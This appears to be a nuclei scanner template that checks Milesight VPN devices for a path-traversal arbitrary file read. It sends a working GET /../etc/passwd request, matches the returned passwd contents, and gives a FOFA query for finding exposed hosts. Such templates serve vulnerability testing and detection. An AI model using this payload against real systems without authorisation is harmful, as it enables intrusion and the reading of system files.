id: milesight-vpn-serverjs-fileread

info:
  name: Milesight VPN server.js 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |
    FOFA: app="Milesight-VPN"
  tags: milesight,fileread

http:
  - raw:
      - |
        GET /../etc/passwd HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:.*?:[0-9]*:[0-9]*:"
        part: body
